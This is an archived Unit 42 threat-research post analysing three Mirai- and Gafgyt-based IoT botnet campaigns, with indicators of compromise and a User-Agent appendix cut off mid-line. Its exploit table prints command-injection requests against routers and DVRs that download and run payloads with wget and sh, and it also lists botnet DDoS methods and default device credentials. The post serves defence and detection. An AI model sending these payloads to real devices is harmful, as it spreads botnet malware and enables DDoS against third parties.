{ "id": "8e8a0a95-7ed0-4291-8f9a-977affa99f85", "created_at": "2026-04-06T00:18:34.375472Z", "updated_at": "2026-04-10T03:38:06.428233Z", "deleted_at": null, "sha1_hash": "139ee73a0b867fe8723fe4f204f997585d3c4379", "title": "Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 937151, "plain_text": "Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns\r\nBy Ruchna Nigam\r\nPublished: 2018-07-20 · Archived: 2026-04-05 17:34:52 UTC\r\nThe end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the\r\nMirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.\r\nSamples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT\r\nReaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that\r\nincorporated nine exploits in its code.\r\nIn their newest evolution, samples also target the D-Link DSL-2750B OS Command Injection  vulnerability, only a few\r\nweeks after the publication of its Metasploit module on the 25th of May (even though the vulnerability has been public\r\nknowledge since February of 2016).\r\nWhile exploring samples belonging to one of these campaigns, I also discovered they support several new DDoS methods\r\npreviously unused by Mirai variants.\r\nThis blog post details each campaign (in the chronological order they were observed) along with the exploits used, the new\r\nDDoS methods supported, ending in a comparative summary of the campaigns.  Also covered is the tangential discovery of\r\nsome Gafgyt samples incorporating new Layer 7 DDoS functionality targeting a known DDoS-protection provider.\r\nIOCs for different campaigns, if not mentioned under the corresponding section, can be found at the end of this blog post.\r\nCAMPAIGN 1: An evolution of Omni\r\nIn May 2018, the Omni botnet, a variant of Mirai, was found exploiting two vulnerabilities affecting Dasan GPON routers -\r\nCVE-2018-10561 (authentication bypass) and CVE-2018-1562 (command injection). The two vulnerabilities used in\r\nconjunction allow the execution of commands sent by an unauthenticated remote attacker to a vulnerable device.\r\nSince then the same family has evolved to incorporate several more exploits, detailed in Table 1.\r\nI used the sample below for this analysis\r\nSHA256 3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d\r\nVULNERABILITY\r\nAFFECTED\r\nDEVICES\r\nEXPLOIT FORMAT\r\nCVE-2018-10561,\r\nCVE-2018-10562\r\nDasan GPON\r\nrouters\r\nXWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host= ;wget+http://%s/gpo\r\nO+-\u003e/tmp/gpon80;sh+/tmp/gpon80\u0026ipv=0\r\nXWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host= ;wget+http://%s/gpo\r\nO+-\u003e/tmp/gpon8080;sh+/tmp/gpon8080\u0026ipv=0\r\nCVE-2014-8361 Different\r\ndevices using\r\nthe Realtek\r\nSDK with the\r\nminiigd\r\ndaemon\r\nPOST /picsdesc.xml\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:AddPortMapping\r\nxmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"\u003e\u003cNewRemoteHost\u003e\r\n\u003c/NewRemoteHost\u003e\u003cNewExternalPort\u003e47500\u003c/NewExternalPort\u003e\r\n\u003cNewProtocol\u003eTCP\u003c/NewProtocol\u003e\u003cNewInternalPort\u003e44382\u003c/NewInternalPort\u003e\r\n\u003cNewInternalClient\u003e cd /tmp/; rm -rf*; wget http://%s/realtek \u003c/NewInternalClient\u003e\r\n\u003cNewEnabled\u003e1\u003c/NewEnabled\u003e\r\n\u003cNewPortMappingDescription\u003esyncthing\u003c/NewPortMappingDescription\u003e\r\n\u003cNewLeaseDuration\u003e0\u003c/NewLeaseDuration\u003e\u003c/u:AddPortMapping\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\r\n/picsdesc.xml\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:AddPortMapping\r\nxmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"\u003e\u003cNewRemoteHost\u003e\r\n\u003c/NewRemoteHost\u003e\u003cNewExternalPort\u003e47500\u003c/NewExternalPort\u003e\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 1 of 13\n\n\u003cNewProtocol\u003eTCP\u003c/NewProtocol\u003e\u003cNewInternalPort\u003e44382\u003c/NewInternalPort\u003e\r\n\u003cNewInternalClient\u003e cd /tmp/;chmod +x realtek;./realtek realtek \u003c/NewInternalClient\u003e\r\n\u003cNewEnabled\u003e1\u003c/NewEnabled\u003e\r\n\u003cNewPortMappingDescription\u003esyncthing\u003c/NewPortMappingDescription\u003e\r\n\u003cNewLeaseDuration\u003e0\u003c/NewLeaseDuration\u003e\u003c/u:AddPortMapping\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\r\nNetgear setup.cgi\r\nunauthenticated\r\nRCE\r\nDGN1000\r\nNetgear\r\nrouters\r\nGET /setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=rm+-rf+/tmp/*;wget+http://%s/net\r\nO+/tmp/netgear;sh+netgear\u0026curpath=/\u0026currentsetting.htm=1\r\nCVE-2017-17215\r\nHuawei\r\nHG532\r\nPOST /ctrlt/DeviceUpgrade_1\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:Upgrade\r\nxmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\u003cNewStatusURL\u003e$(/bin/bu\r\nwget -g %s -l /tmp/huawei -r /huawei; sh /tmp/huawei)\u003c/NewStatusURL\u003e\r\n\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\u003c/NewDownloadURL\u003e\u003c/u:Upgrade\u003e\u003c/s:Body\r\n\u003c/s:Envelope\u003e\r\nEir WAN Side\r\nRemote Command\r\nInjection\r\nEir D1000\r\nrouters\r\nPOST /UD/act?1\r\n\u003c?xml version=\"1.0\"?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cSOAP-ENV:Body\u003e\r\n\u003cu:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\u0026qu ot;\u003e\u003cNewNTPServer1\u003e cd\r\n\u0026\u0026 rm -rf * \u0026\u0026 /bin/busybox wget http://%s/tr064 \u0026\u0026 sh /tmp/tr064 \u003c/NewNTPServer1\u003e\r\n\u003cNewNTPServer2\u003e echo OMNI \u003c/NewNTPServer2\u003e\u003cNewNTPServer3\u003e echo\r\nOMNI \u003c/NewNTPServer3\u003e\u003cNewNTPServer4\u003e echo OMNI \u003c/NewNTPServer4\u003e\r\n\u003cNewNTPServer5\u003e echo OMNI \u003c/NewNTPServer5\u003e\u003c/u:SetNTPServers\u003e\u003c/SOAP-ENV:Body\r\n\u003c/SOAP-ENV:Envelope\u003e\r\nPOST /UD/act?1\r\n\u003c?xml version=\"1.0\"?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cSOAP-ENV:Body\u003e\r\n\u003cu:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\u0026qu ot;\u003e\u003cNewNTPServer1\u003e cd\r\n\u0026\u0026 rm -rf * \u0026\u0026 /bin/busybox wget http://%s/tr064 \u0026\u0026 sh /tmp/tr064 \u003c/NewNTPServer1\u003e\r\n\u003cNewNTPServer2\u003e echo OMNI \u003c/NewNTPServer2\u003e\u003cNewNTPServer3\u003e echo\r\nOMNI \u003c/NewNTPServer3\u003e\u003cNewNTPServer4\u003e echo OMNI \u003c/NewNTPServer4\u003e\r\n\u003cNewNTPServer5\u003e echo OMNI \u003c/NewNTPServer5\u003e\u003c/u:SetNTPServers\u003e\u003c/SOAP-ENV:Body\r\n\u003c/SOAP-ENV:Envelope\u003e\r\nHNAP SoapAction-Header Command\r\nExecution\r\nD-Link\r\ndevices\r\nPOST /HNAP1/\r\nSOAPAction: http://purenetworks.com/HNAP1/ cd /tmp \u0026\u0026 rm -rf * \u0026\u0026 wget http://%s/hn\r\nsh /tmp/hnap\r\n(Faulty exploit:\r\nThis vulnerability stems from the fact that anything trailing the last '/' after the string\r\n“http://purenetworks.com/HNAP1/GetDeviceSettings” in the SoapAction header value is exec\r\nusing the system command without sanitization\r\nIn this implementation, the exploit code is appended to “http://purenetworks.com/HNAP1/”, an\r\nhence the above condition will not be triggered. To the best of my knowledge this exploit will\r\nwork on any devices)\r\nCCTV/DVR Remote\r\nCode Execution\r\nCCTVs,\r\nDVRs from\r\nGET /language/Swedish${IFS}\u0026\u0026cd${IFS}/tmp;rm${IFS}-\r\nrf${IFS}*;wget${IFS}http://%s/crossweb;sh${IFS}/tmp/crossweb\u0026\u003er\u0026\u0026tar${IFS}/string.js\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 2 of 13\n\nover 70\r\nvendors\r\nJAWS Webserver\r\nunauthenticated\r\nshell command\r\nexecution\r\nMVPower\r\nDVRs,\r\namong others\r\nGET /shell?cd+/tmp;rm+-rf+*;wget+http://%s/jaws;sh+/tmp/jaws\r\nUPnP SOAP\r\nTelnetD Command\r\nExecution\r\nD-Link\r\ndevices\r\nPOST /soap.cgi?service=WANIPConn1\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cSOAP-ENV:Body\u003e\r\n\u003cm:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"\u003e\r\n\u003cNewPortMappingDescription\u003e\u003cNewPortMappingDescription\u003e\u003cNewLeaseDuration\u003e\r\n\u003c/NewLeaseDuration\u003e\u003cNewInternalClient\u003e cd /tmp;rm -rf *;wget http://%s/dlink;sh\r\n/tmp/dlink \u003c/NewInternalClient\u003e\u003cNewEnabled\u003e1\u003c/NewEnabled\u003e\r\n\u003cNewExternalPort\u003e634\u003c/NewExternalPort\u003e\u003cNewRemoteHost\u003e\u003c/NewRemoteHost\u003e\r\n\u003cNewProtocol\u003eTCP\u003c/NewProtocol\u003e\u003cNewInternalPort\u003e45\u003c/NewInternalPort\u003e\r\n\u003c/m:AddPortMapping\u003e\u003cSOAPENV:Body\u003e\u003cSOAPENV:envelope\u003e\r\nNetgear cgi-bin\r\nCommand Injection\r\nNetgear\r\nR7000/R6400\r\ndevices\r\nGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-\r\nrf${IFS}*;${IFS}wget${IFS}http://%s/netgear2;${IFS}sh${IFS}/var/tmp/netgear2\r\nVacron NVR RCE\r\nVacron NVR\r\ndevices\r\nGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s/vacron;sh+/tmp/vacron\r\nAll of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in\r\ncombination with others in the past, however, this is the first Mirai variant using all eleven of them together.\r\nDifferentiating features of the campaign:\r\nTwo different encryption schemes: Aside from using the standard XOR encryption scheme seen in all Mirai variants,\r\nin this case using the table key 0xBAADF00D samples make use of a second key for the encryption of certain config\r\nstrings.\r\nSamples rely solely on exploits for propagation and don’t perform a credential brute-force attack.\r\nFurther infection of infected devices is prevented by dropping packets received on certain ports using iptables (Figure\r\n1)\r\nFigure 1: Screenshot from malware disassembly showing the use of iptables to drop future connection attempts via certain\r\nports\r\nThe campaign makes use of the IP 213[.]183.53.120 both for serving payloads, and as a Command and Control (C2) server.\r\nPivoting off this IP, I discovered some Gafgyt samples that surfaced around the same time reporting to the same IP, but using\r\na new method named 'SendHTTPCloudflare'. This method is detailed at the end of this blog post.\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 3 of 13\n\nThis campaign was linked to the Omni variant on several references in the code as seen such as the one seen in Figure 2\r\nbelow.\r\nFigure 2: OMNI reference in samples\r\nThe encrypted strings also reference a website gpon[.]party that was down at the time of this writing.\r\nFigure 3: gpon[.]party reference\r\nCAMPAIGN 2: Okane\r\nSamples from this campaign were served from the IP 46[.]243.189.101. This host briefly had an open directory containing\r\nthe samples, as seen in the figure below.\r\nFigure 4: Screenshot from open directory at payload server 46[.]243.189.101\r\nThe payload source in this attack was located at hxxp://46[.]243.189.101/gang/. The downloaded payload is a shell script\r\nthat attempts to replicate itself by downloading Okane binaries to vulnerable devices.  On the 13th of June, the payload\r\nsource for some of these samples was briefly replaced with the Cloudflare DNS server 1[.]1.1.1.\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 4 of 13\n\nThis campaign incorporates the same exploits listed in Table 1. Figure 5 shows these exploits being called sequentially in\r\none of the samples belonging to this campaign. Each call results in the creation of a dedicated fork for each exploit.\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 5 of 13\n\nFigure 5: Screenshot from malware disassembly of exploit calls in a sample from Campaign 2\r\nUnlike the previous campaign, these samples also perform a credential brute force attack. Some unusual entries were\r\ndiscovered on the brute force lists in these samples, such as the following:\r\nroot/t0talc0ntr0l4! - default credentials for Control4 devices\r\nadmin/adc123 - default credentials for ADC FlexWave Prism devices\r\nmg3500/merlin - default credentials for Camtron IP cameras\r\nSome samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.\r\nBelow are descriptions of these new DDoS methods, extracted from the following sample.\r\nSHA256 320ed65d955bdde8fb17a35024f7bd978d26c041de1ddcf8a592974f77d82401\r\nattack_method_tcpxmas: involves sending TCP packets with all flags set, also known as Christmas tree packet This\r\ncould be considered a more effective means of DDoS since these packets “require much more processing by routers\r\nand end-hosts than the \"usual\" packets do.” This method has already been observed used by Gafgyt and Kaiten\r\nvariants in the past. The payload size of packets sent is set to 768 bytes.\r\nattack_method_std: involves sending packets with a randomized payload of 1024 bytes.\r\nDigging deeper reveals that samples using these attack methods have been part of a Mirai code fork from as early as August\r\n2017.\r\nSome newer samples from the same campaign also integrate additional methods that only appear in samples from the\r\nbeginning of June 2018. Some notable methods are detailed below.\r\nFor this analysis I used a sample with the following hash.\r\nSHA256 be1d722af56ba8a660218a8311c0482c5b2d096ba91485e7d9dfc12a2b8e00b3\r\nattack_method_udpgame: UDP DDoS using SOCK_RAW from a random source port to the destination port 27015\r\n(often used by online game servers).\r\nattack_method_asyn: TCP DDoS using packets with random source and destination ports, using packets with the\r\nACK and SYN flags set.\r\nattack_method_tcpfrag: TCP DDoS using SOCK_RAW with random source and destination ports and sequence\r\nnumber, and flags URG, ACK, PSH, RST, SYN and FIN set. In this case the ‘Don’t Fragment’ bit is set to 1.\r\nattack_method_tcpall: same as attack_method_tcpfrag above, except the ‘Don’t Fragment’ bit is set to 0.\r\nattack_method_tcpusyn: TCP DDoS using packets with random source and destination ports, using packets with the\r\nURG and SYN flags set.\r\nOn the 19th of June, samples on this server were stripped of their exploits and reverted to using a simple brute force and\r\nsubsequently dropping a shell script, for self-propagation.\r\nFigure 6: Shell script used by newer Okane samples for self-propagation\r\nCAMPAIGN 3: Hakai\r\nEarlier samples belonging to this campaign use all the exploits detailed in Table 1, except for the UPnP SOAP TelnetD\r\nCommand Execution exploit.  The payload source for this campaign was hxxp://hakaiboatnet[.]pw/m and the C2 server was\r\n178[.]128.185.250. Samples make use of an encryption scheme similar to Mirai; unlike previous campaigns, they are built\r\non the Gafgyt source code, which is also known as Bashlite, Lizkebab, Torlus or LizardStresser.\r\nSamples listen for the following commands:\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 6 of 13\n\nCommand Translation\r\nSC ON Scanner On\r\nSC OFF Scanner Off\r\nH HTTP Flood\r\nU UDP Flood\r\nS STD Flood\r\nT TCP Flood\r\nKT Kill scanner threads\r\nNewer samples from the same server were found to have also incorporated an OS Command Injection exploit against D-Link DSL-2750B devices. These samples use the same attack methods, encryption key and C2 as the samples above,\r\nhowever they source their payload from hxxp://178[.]128.185.250/e.\r\nFigure 7: Exploit targeting D-Link DSL-2750B devices used in newer samples of the campaign\r\nSummary\r\nTable 2 shows a comparative summary of the three campaigns\r\nCampaign\r\nExploits\r\nUsed\r\nBuilt\r\non\r\nPayload source C2\r\nConfig string\r\nencryption/decryption\r\nkey\r\nAlso br\r\nforces\r\ncredent\r\n1:\r\nEvolution\r\nof OMNI\r\nAll\r\nexploits in\r\nTable 1\r\nMirai hxxp://213[.]183.53.120 213[.]183.53.120\r\nTwo different keys\r\nused – 0xBAADF00D,\r\n0xDEADBEEF (or the\r\nequivalent of a byte-wise XOR with 0x22)\r\nNo\r\n2: Okane\r\nAll\r\nexploits in\r\nTable 1\r\nMirai hxxp://46[.]243.189.101/gang/ 142[.]129.169.83:5888 0xDEACFBEF Yes\r\n3: Hakai All\r\nexploits in\r\nTable 1,\r\nexcept\r\nUPnP\r\nSOAP\r\nTelnetD\r\nCommand\r\nExecution.\r\nNewer\r\nsamples\r\nalso\r\nGafgyt hxxp://hakaiboatnet[.]pw/m,\r\nhxxp:// 178[.]128.185.250/e\r\n178[.]128.185.250 0xDEDEFFBA Yes\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 7 of 13\n\nincorporate\r\na D-Link\r\nDSL-2750B OS\r\nCommand\r\nInjection\r\nexploit\r\nTable 2: Comparative summary of the attack campaigns\r\nGafgyt with a new Layer-7 attack\r\nLayer-7 DDoS attacks targeting specific DDoS protection service vendors are not new and were already observed in the\r\nform of the DvrHelper variant of Mirai.\r\nThey have however not been observed used by Gafgyt samples until now. While pivoting on the C2 used by samples of\r\nCampaign 1, I came across some Gafgyt samples listening for an additional command called HTTPCF.\r\nWhen this command is received, the bot calls a function called SendHTTPCloudflare that does as its name suggests,\r\ntargeting a URL path used mostly by sites protected by Cloudflare. The earliest samples observed using this attack were\r\nfrom the end of May 2018.\r\nFigure 8: URL format targeted by HTTPCF\r\nSamples use the same IP i.e. 213[.]183.53.120 at port 8013 for C2 communication.\r\nThey also make use of some unusual User-Agents (UA) as seen in Figure 9. All UAs found in these samples are listed in the\r\nappendix\r\nFigure 9: Some unusual User Agents found in related Gafgyt samples\r\nConclusion\r\nThe initial rise of botnets targeting embedded systems had brought to light the security risks from millions of Internet-connected devices configured with default credentials.\r\nThe evolution of these botnets to the use of multiple exploits, be it IoT Reaper or the campaigns discussed here, shows how\r\nattackers can build enormous botnets consisting of different types of devices, all responding to the same C2 server. This is\r\nexacerbated by the speed of exploitation in the wild of newly released vulnerabilities and also highlights the need for\r\nsecurity vendor reactivity in response to these disclosures, applicable to the subset of these devices that do fall under the\r\nprotection of security devices. However, the onus is on device manufacturers to ensure their devices are easy to update, and\r\nthat they deploy the updates in a timely manner.\r\nPalo Alto Networks customers benefit from the following protections against these attacks:\r\nAutoFocus customers can track these activities using individual exploit tags:\r\nCVE-2017-17215\r\nCVE-2014-8361\r\nDLinkOSInjection\r\nNetgearRCE\r\nVacronNVRRCE\r\nEirRCE\r\nGPONExploits\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 8 of 13\n\nDLinkDSL2750BOSCmdInjection\r\nAutoFocus customers can also use the following malware family tags :\r\nGafygt\r\nELFMirai\r\nWildFire detects all related samples with malicious verdicts.\r\nAll exploits and IPs/URLs involved in these campaigns are blocked through Threat Prevention and PANDB.\r\nIndicators of Compromise\r\nCampaign 1 samples\r\n000b018848e7fd947e87f1d3b8432faccb3418e0029bde7db8abf82c552bbc63\r\n37e3a07a17a82175c60992f18eaf169e4014915eb90fac5b4704060572cfa60b\r\n3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d\r\n3b3a66c2c27f5821d5304e22a2a34b044027ffaac327df5263674b4aa25bc901\r\n4c07af1041e0d83437d4b14226204652574b428cd1dbd4bfc7047c13dffc4700\r\nCampaign 1 related URLs/IPs\r\n213[.]183.53.120\r\nOkane Multi-exploit samples\r\n00499879c74122881e436fbf701a823d4dc53ff6946e58dd0e5410bad24f3d57\r\n0fa81ebe444cfe7413f90ca116817cdfa3ccfdc41160fcd64032630d30b2d598\r\n11628ac93368228e949d9b7e380a065e58c02626a8fd7896db8c2dec51583d1d\r\n1d6c5a560bbb57695c502b5d642e48fbe6bddc45defdb56fa25bd94ae17e5a14\r\n216492260b8d1342988c1688962dd95a48af8c801afe03c6801ec07d74862e60\r\n264a194bda6aaa51665d5c872237613ac153e67827e7b0bbbe84b4e8e464544c\r\n38736acdf58a418acd778a3203df9e84b4470a71031fe9e6d52170ad3c15e794\r\n39893d4a033fd29faea37d09b4c8cfb9be04ffc19288506551e18d294e96bb2d\r\n49f98a91c95a633a6d7a9a134e3a8e881e12aeede758a4367432ad3cab1c2b28\r\n50473fc0d89fd5ed0a20c96f34c419c5ee66e630fecb88a095283450229a934e\r\n509a7cc2335ef667ddc20298a3fae9c9c966be400719343cb59b042d05a98426\r\n5352dc35d97ceb2d9bf58113ee1196daea66cd4a4bce9acba29ee05f4d84170e\r\n55771db22c6305f7fba0b20b19b8537e85a45b80ddbcba1ffe0f6d30ef8697d6\r\n645128d788b5cc1becc2546973e658c03e2ee33116013b84c05904a18044e353\r\n834e675813e517aa0b4b6c65edbb2e8bf141b272f6918b443c69793db365ff3b\r\n893309bc397058d50bba7c5c077bfc7f64956a098e452c63813c074beb8837dc\r\n8b65ac91af993f95b57535e5a71571bbc06fbb37e1bfd47313585dceda345fd9\r\n916cf77c6af335732007fd0c09ec49b8f29053731a062c33a66d65793495dcd5\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 9 of 13\n\n93fa2bb5a64216d8579a53debcb9b2dade3a0a995c3026b04667fd472e7841a3\r\n9e150ccd410ed8a3a8673e092450bd6dc0f5abc2d7306e2d05b57cfb21d8d4df\r\n9fe586ead4a1b003c023c75467c9b1fcda3414265ea50e060e939a4078c79234\r\na0d7592cfcd469e10a9ca463780737c76d3e61c5b750345998b18721b3565f0d\r\na36adfa5ecec9ad5429c817de3fbece20d1b526c116d2bfccd9366aabacc2c32\r\nac7bb0c8bf67186572ee931f86f679e12f6737d8e36936fb40a870dc3aeeee22\r\nb2156ce005eacccabe0ed668bbced761df1da1f1da32e645d344eaa8f075dbb9\r\nb55bea0bf708734491d101f41ecdbb592e69b8ccc053b7dfc33fe3e465c80b9f\r\nb72c22efed4b68d52fbc97360c388fc1812d431c208cf35af5bdcc850e8a2e01\r\nbc11fcafe415b1bf74abbeb5189cb72f991bb6dfb01b61f2d96cbb4cfd6d9e2f\r\nbd89be28ddecca983cc91835febce818a1f09bda471399b031f99c5278169344\r\nbf94315a9591d77ee2d08823afaeaf7e45133d4af2d3c3ce4086aff371f248d2\r\nc02a7a06f77bad974acd6bc193e1cb7dc73a009317f1044d202593dc3b0a67cf\r\nc42bdc0d7bbdf9a74db9233010f2b04ca14e0864119a1c98d6c8a7a63574791c\r\nc659709cbea976692e4be58f1f04d99127b55325f404c63525fb9ab575a66b2d\r\nc750d1ad0d5f5d7dda2ab8dba33fa49ef1c636905abab364a70db44ab8035ab6\r\ncfd33c0bcb7001c56a8e9438c1a5d6b34c6bdd7a2404c2fe0cdfea00abdf355a\r\nd15d46b4d9d826bcf8cb0b43fa1f7e874708db9bb068c3aff27daa7193b51fd7\r\nd2655773f812887da069965ad8113501aeb0a0e26aa27faa9a1469fd510ceb3c\r\ndacdf9b548f123482f5ecc2a29d2d156021bdab250a933ace9aee140041b9abb\r\ndbdffabc13a70a41188900620569266b5774deb007e0ef6dc63ff16ce72b4595\r\ndcfae13f567ea01c872db539c5d89448ebde2debe46421eccf752d4e20298c58\r\ne0ddec27709ec513886a217009f55994ddf61f58887774d6403ec18d5612d9e6\r\ne8782c38fc7c148be589a3c44f915719378840ddbf709fd48932797609f8daf2\r\nec1fdb298556406d75506a234562f60ae517569963a317741dd4bd90680fb4ad\r\nedf32e6317253a323c4e815485ff4b97c4e0af268be8d78c9c0e48ac87e52e55\r\nf390995777d4cad93854e4030b8bc33d2405c7ddd548da5e00a589b9e7afd722\r\nOkane related IPs/URLs\r\n46[.]243.189.101\r\n142[.]129.169.83:5888\r\nOkane Multi-exploit samples fetching payload from 1.1.1.1\r\n25763b7871c0be5dc9a3ffa4abb4fce308297baf14c0389a70336b429b0c7c39\r\n7bde2df856061806a1a7294b780bfbcf1439ec0f9dbb4d6495c7c0d5873505d5\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 10 of 13\n\nfca262afd92ec24af4370c664b68f453c3f97f3555ab37178ec80bbaebf7dfa6\r\nOkane Multi-exploit samples using attack_method_tcpxmas and attack_method_std\r\n0e7d4fa178b78cbfd0eaea910a53c7b933590764b72a93cd54f5823076869ab5\r\n320ed65d955bdde8fb17a35024f7bd978d26c041de1ddcf8a592974f77d82401\r\n5eef17f59d2c3d88d08da8d07dcca13e4225d800fce7a7fed5504e789008dc17\r\n692b3b9ea76447447b11655711cdd22040972b1903749fe49b478ec92cdd4f7a\r\na0d7592cfcd469e10a9ca463780737c76d3e61c5b750345998b18721b3565f0d\r\na36adfa5ecec9ad5429c817de3fbece20d1b526c116d2bfccd9366aabacc2c32\r\nc42bdc0d7bbdf9a74db9233010f2b04ca14e0864119a1c98d6c8a7a63574791c\r\nd15d46b4d9d826bcf8cb0b43fa1f7e874708db9bb068c3aff27daa7193b51fd7\r\nOkane sample without exploits using several additional DDoS methods\r\n0ea858e747863f2c94eda3f28167951ad8cafca2cb0be1c247d01a53fb7e56e0\r\nbe1d722af56ba8a660218a8311c0482c5b2d096ba91485e7d9dfc12a2b8e00b3\r\nHakai samples\r\n0f5b814308193064bc4ece4266def5c1baecc491117f07650c5117762648d4c5\r\n46625884d4cc5ec9ca32221e90f3c187ef7d713fbabe8e33cad843587c0911e0\r\n721da99e8789cdcb73db87353e2be7b82c9158e2929b9eaa7d5b4660b6d4d1e2\r\n76a2853701ab4a8d989f383857d0d4cb8d6a7df38d543d4cb06a02079acb74c2\r\n7e8280387887f27461f2ed758a401daf49e27342c684f199751391bfb83f438d\r\nc959e580c4709c8aa304ffe5b3ab4ccfbdb3327b695cf5f8b4d27591664579f7\r\nd248c1ce41d474de0ea05b34d721271c53a861e06d355e4e6e83a8955c7bbc0a\r\nd669388681bb8d17aa2d5ee1f943ae5e8ad8729d88c78ec86b10fe51a4701c43\r\nf05e731a3dca8868af3a05ae4867a39f397e0d54221229c0be74c8a20d00e364\r\nHakai URLs/IPs\r\nhakaiboatnet[.]pw\r\n178[.]128.185.250\r\nGafgyt HTTPCF samples\r\n1eec1ef48d93106f3f00b4d4868b32a3ca8ca8da9a0852ef81a9e9226206362b\r\n385ba7fcf276fb0b469defac7762908921df820c550e98abadec725f455b76fe\r\n5c797cd7faf5061a75c68cc8f658c7daab94c223f523bfca0a28ba2620b1cd9f\r\n8339dc35688574b33b523234ba76fee56d57b369c9c0292644ec2a0cf798244d\r\na5fe23186c95bfa9e5df8b3fb28a1922a1e820b8f51401d9042542e18f9aaec1\r\nc12132f341d19c386a617ff2a607df35648ab6f17106608a575d086fadfe3a04\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 11 of 13\n\nc159087ee8af27685a6b46b18cb59dfbcff85a165cd308c5d617eb3f8166b328\r\ne949a6429530b8b6876073dc025a0cda0d6311a6dc15fcb72b24a3fe6cb86529\r\nfe0c3682dac042b8cb92e731ace80660d7722782c1c5551ec2a18e747788c73d\r\nAPPENDIX\r\nUser-Agents used by Gafgyt HTTPCF samples\r\nMOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1\r\nMozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000\r\nMozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0\r\nMOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0\r\nMozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)\r\nMozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)\r\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0\r\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 